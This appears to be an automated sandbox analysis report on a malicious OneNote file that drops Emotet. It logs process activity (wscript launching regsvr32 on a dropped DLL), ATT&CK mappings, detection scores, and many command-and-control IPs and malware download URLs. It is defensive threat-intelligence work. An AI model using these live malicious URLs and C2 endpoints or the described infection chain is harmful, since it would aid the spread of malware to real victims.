                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exe TID: 6052Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exe TID: 960Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 4724Thread sleep time: -270000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 9.3 %
                      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0000000180008D28 FindFirstFileExW,12_2_0000000180008D28
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: regsvr32.exe, 0000000D.00000002.561180722.0000000000A52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000A52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.400278720.0000000000A52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW6
                      Source: regsvr32.exe, 0000000D.00000002.561122333.0000000000A0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.400051235.0000000000A0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`v
                      Source: wscript.exe, 0000000A.00000003.342708876.00000000059CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342624531.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.343202791.0000000005A60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.345217524.0000000005A60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342805819.00000000059D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.348973973.00000000059DA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.349159555.0000000005A60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.561180722.0000000000A52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000A52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.400278720.0000000000A52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0000000180001C48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_000000018000A878 GetProcessHeap,12_2_000000018000A878
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,12_2_0000000180010C10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0000000180001C48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_00000001800082EC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00000001800082EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_00000001800017DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00000001800017DC

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 159.65.88.10 8080Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 164.90.222.65 443Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 203.26.41.131 443Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeDomain query: penshorn.org
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 66.228.32.31 7080Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 187.63.160.88 80Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.168.155.143 8080Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 159.89.202.34 443Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 91.121.146.47 8080Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 160.16.142.56 8080Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 182.162.143.56 443Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 167.172.199.165 8080Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 163.44.196.120 8080Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad617F4.tmp.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_00000001800070A0 cpuid 12_2_00000001800070A0
                      Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0000000180001D98 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,12_2_0000000180001D98

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Malicious OneNote
                      Source: Yara matchFile source: Insight_Medical_Publishing_1.one, type: SAMPLE
                      Source: Yara matchFile source: C:\Users\user\Desktop\Insight_Medical_Publishing_1.one, type: DROPPED
                      Yara detected Emotet
                      Source: Yara matchFile source: 0000000D.00000002.560675790.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 13.2.regsvr32.exe.8f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.regsvr32.exe.8f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.regsvr32.exe.2550000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.regsvr32.exe.2550000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000D.00000002.559981390.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.560329835.0000000000921000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.315209574.0000000002550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected Malicious OneNote
                      Source: Yara matchFile source: Insight_Medical_Publishing_1.one, type: SAMPLE
                      Source: Yara matchFile source: C:\Users\user\Desktop\Insight_Medical_Publishing_1.one, type: DROPPED

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1
                      Scripting                      		2
                      Registry Run Keys / Startup Folder                      		111
                      Process Injection                      		21
                      Masquerading                      		OS Credential Dumping1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		Exfiltration Over Other Network Medium11
                      Encrypted Channel                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts1
                      Exploitation for Client Execution                      		1
                      DLL Side-Loading                      		2
                      Registry Run Keys / Startup Folder                      		1
                      Virtualization/Sandbox Evasion                      		LSASS Memory121
                      Security Software Discovery                      		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                      Non-Standard Port                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)1
                      DLL Side-Loading                      		111
                      Process Injection                      		Security Account Manager1
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Ingress Tool Transfer                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Scripting                      		NTDS2
                      Process Discovery                      		Distributed Component Object ModelInput CaptureScheduled Transfer3
                      Non-Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Hidden Files and Directories                      		LSA Secrets1
                      Remote System Discovery                      		SSHKeyloggingData Transfer Size Limits114
                      Application Layer Protocol                      		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      Obfuscated Files or Information                      		Cached Domain Credentials2
                      File and Directory Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Regsvr32                      		DCSync25
                      System Information Discovery                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading                      		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 828501 Sample: Insight_Medical_Publishing_1.one Startdate: 17/03/2023 Architecture: WINDOWS Score: 100 43 129.232.188.93 xneeloZA South Africa 2->43 45 45.235.8.30 WIKINETTELECOMUNICACOESBR Brazil 2->45 47 35 other IPs or domains 2->47 59 Snort IDS alert for network traffic 2->59 61 Multi AV Scanner detection for domain / URL 2->61 63 Antivirus detection for URL or domain 2->63 65 7 other signatures 2->65 10 ONENOTE.EXE 50 501 2->10         started        14 ONENOTEM.EXE 2->14         started        signatures3 process4 dnsIp5 49 192.168.2.1 unknown unknown 10->49 39 C:\Users\...\Insight_Medical_Publishing_1.one, data 10->39 dropped 16 wscript.exe 2 10->16         started        21 ONENOTEM.EXE 1 10->21         started        file6 process7 dnsIp8 41 penshorn.org 203.26.41.131, 443, 49701 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia 16->41 33 C:\Users\user\AppData\...\rad617F4.tmp.dll, PE32+ 16->33 dropped 35 C:\Users\user\AppData\Local\Temp\click.wsf, ASCII 16->35 dropped 57 System process connects to network (likely due to code injection or exploit) 16->57 23 regsvr32.exe 16->23         started        file9 signatures10 process11 process12 25 regsvr32.exe 2 23->25         started        file13 37 C:\Windows\...\clpHRoMLOOCr.dll (copy), PE32+ 25->37 dropped 67 Hides that the sample has been downloaded from the Internet (zone.identifier) 25->67 29 regsvr32.exe 25->29         started        signatures14 process15 dnsIp16 51 160.16.142.56, 8080 SAKURA-BSAKURAInternetIncJP Japan 29->51 53 91.121.146.47, 49704, 8080 OVHFR France 29->53 55 9 other IPs or domains 29->55 69 System process connects to network (likely due to code injection or exploit) 29->69 signatures17

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Insight_Medical_Publishing_1.one33%ReversingLabsWin32.Trojan.OneNote
                      Insight_Medical_Publishing_1.one42%VirustotalBrowse

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\rad617F4.tmp.dll58%ReversingLabsWin64.Trojan.Emotet
                      C:\Windows\System32\FtYcgioKSiXTtw\clpHRoMLOOCr.dll (copy)58%ReversingLabsWin64.Trojan.Emotet

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      13.2.regsvr32.exe.8f0000.0.unpack100%AviraHEUR/AGEN.1215476Download File
                      12.2.regsvr32.exe.2550000.0.unpack100%AviraHEUR/AGEN.1215476Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      penshorn.org11%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://cdn.entity.0%URL Reputationsafe
                      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                      https://api.aadrm.com/0%URL Reputationsafe
                      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                      https://officeci.azurewebsites.net/api/0%URL Reputationsafe
                      https://my.microsoftpersonalcontent.com0%URL Reputationsafe
                      https://store.office.cn/addinstemplate0%URL Reputationsafe
                      https://www.odwebp.svc.ms0%URL Reputationsafe
                      https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
                      https://d.docs.live.net0%URL Reputationsafe
                      https://ncus.contentsync.0%URL Reputationsafe
                      https://wus2.contentsync.0%URL Reputationsafe
                      https://skyapi.live.net/Activity/0%URL Reputationsafe
                      https://api.cortana.ai0%URL Reputationsafe
                      https://staging.cortana.ai0%URL Reputationsafe
                      https://wus2.pagecontentsync.0%URL Reputationsafe
                      https://cortana.ai/api0%URL Reputationsafe
                      https://104.168.155.143:8080/0%URL Reputationsafe
                      https://powerlift.acompli.net0%URL Reputationsafe
                      https://cortana.ai0%URL Reputationsafe
                      https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/21%VirustotalBrowse
                      https://160.16.142.56:8080/acfnurik/pjkp/0%Avira URL Cloudsafe
                      https://penshorn.org/0%Avira URL Cloudsafe
                      https://66.228.32.31:7080/11%VirustotalBrowse
                      http://ozmeydan.com/cekici/9/15%VirustotalBrowse
                      https://66.228.32.31:7080/100%Avira URL Cloudmalware
                      http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0100%Avira URL Cloudmalware
                      http://ozmeydan.com/cekici/9/100%Avira URL Cloudmalware
                      https://penshorn.org/admin/Ses8712iGR8du/tM100%Avira URL Cloudmalware
                      https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/100%Avira URL Cloudmalware
                      https://penshorn.org/8.0%Avira URL Cloudsafe
                      https://104.168.155.143:8080/l100%Avira URL Cloudmalware
                      https://163.44.196.120:8080/acfnurik/pjkp/100%Avira URL Cloudmalware
                      https://159.89.202.34/acfnurik/pjkp/G100%Avira URL Cloudmalware
                      https://164.90.222.65/acfnurik/pjkp/-100%Avira URL Cloudmalware
                      https://91.121.146.47:8080/acfnurik/pjkp/100%Avira URL Cloudmalware
                      https://187.63.160.88:80/acfnurik/pjkp/q100%Avira URL Cloudmalware
                      https://microsoftapc-my.sharepoint.com0%Avira URL Cloudsafe
                      https://104.168.155.143:8080/acfnurik/pjkp/100%Avira URL Cloudmalware
                      https://159.89.202.34/acfnurik/pjkp/100%Avira URL Cloudmalware
                      https://www.gomespontes.com.br/logs/pd/100%Avira URL Cloudmalware
                      https://159.65.88.10:8080/100%Avira URL Cloudmalware
                      https://163.44.196.120:8080/L100%Avira URL Cloudmalware
                      https://penshorn.org/admin/Ses8712iGR8du/otn100%Avira URL Cloudmalware
                      https://159.65.88.10:8080/acfnurik/pjkp/100%Avira URL Cloudmalware
                      http://ozmeydan.com/cekici/9/xM100%Avira URL Cloudmalware
                      https://160.16.142.56:8080/0%Avira URL Cloudsafe
                      http://softwareulike.com/cWIYxWMPkK/100%Avira URL Cloudmalware
                      https://penshorn.org:443/admin/Ses8712iGR8du/100%Avira URL Cloudmalware

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      penshorn.org
                      		203.26.41.131
                      		truetrueunknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://shell.suite.office.com:1443D0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                        		high
                        https://autodiscover-s.outlook.com/D0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                          		high
                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                            		high
                            https://cdn.entity.D0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/D0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                              		high
                              https://rpsticket.partnerservices.getmicrosoftkey.comD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://lookup.onenote.com/lookup/geolocation/v1D0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                		high
                                https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                  		high
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                    		high
                                    https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/wscript.exe, wscript.exe, 0000000A.00000003.330847371.00000000056DF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.322100825.0000000003144000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.322645365.0000000003155000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.344745583.00000000058AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337313422.0000000005744000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342708876.00000000059CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.322847815.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.326801237.0000000005634000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338014763.0000000005799000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.349049882.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340897230.00000000058AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.341340667.00000000058D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337313422.0000000005784000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342086843.0000000005957000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.321369309.000000000311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.325136624.0000000005507000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330151704.0000000005654000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342624531.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324592475.000000000556E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330572608.00000000056E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • 21%, Virustotal, Browse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://api.aadrm.com/D0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://66.228.32.31:7080/regsvr32.exe, 0000000D.00000003.533737252.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • 11%, Virustotal, Browse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                      		high
                                      https://api.microsoftstream.com/api/D0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                        		high
                                        https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                          		high
                                          https://cr.office.comD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                            		high
                                            https://res.getmicrosoftkey.com/api/redemptioneventsD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://tasks.office.comD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                              		high
                                              https://officeci.azurewebsites.net/api/D0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://ozmeydan.com/cekici/9/wscript.exe, wscript.exe, 0000000A.00000003.330847371.00000000056DF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.322100825.0000000003144000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.322645365.0000000003155000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.344745583.00000000058AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337313422.0000000005744000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342708876.00000000059CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.322847815.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.326801237.0000000005634000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338014763.0000000005799000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.349049882.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340897230.00000000058AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.341340667.00000000058D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337313422.0000000005784000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342086843.0000000005957000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.321369309.000000000311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.325136624.0000000005507000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330151704.0000000005654000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342624531.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324592475.000000000556E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330572608.00000000056E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • 15%, Virustotal, Browse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://my.microsoftpersonalcontent.comD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://penshorn.org/wscript.exe, 0000000A.00000002.349066831.0000000005A24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.343720748.0000000005A23000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://store.office.cn/addinstemplateD0161517-DEC8-4879-886E-56C64A97E450.0.drfalse
                                              • URL Reputation: safe
                                              		unknown
